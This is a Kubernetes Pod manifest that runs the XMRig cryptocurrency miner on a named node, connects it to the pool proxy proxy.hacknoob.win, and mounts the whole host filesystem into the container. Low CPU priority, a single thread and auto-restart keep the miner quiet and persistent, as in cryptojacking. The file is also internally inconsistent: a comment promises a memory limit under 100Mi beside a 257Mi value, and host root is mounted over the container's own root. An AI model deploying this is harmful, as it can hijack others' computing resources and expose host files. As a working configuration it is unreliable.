apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-1
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - slave1
  containers:
  - name: xmrig-container-1
    image: alpine
    command:
    - /home/worker1/xmrig/build/xmrig
    - -o
    - proxy.hacknoob.win:5551
    - -u
    - slave1+150
    - -a
    - rx/0          # Use a lower memory algorithm if possible
    - --threads
    - "1"            # Set to 1 thread to reduce memory
    - --no-huge-pages
    - --cpu-priority
    - "5"            # Lower CPU priority
    - --donate-level
    - "0"            # Set donate level to zero to save resources
    resources:
      limits:
        memory: "257Mi"   # Set a limit under 100Mi
        cpu: "500m"      # Limit to half a CPU core
    volumeMounts:
    - name: xmrig-volume-1
      mountPath: /
  restartPolicy: Always   # Automatically restart if the Pod fails
  volumes:
  - name: xmrig-volume-1
    hostPath:
      path: / # Adjust to correct path as needed
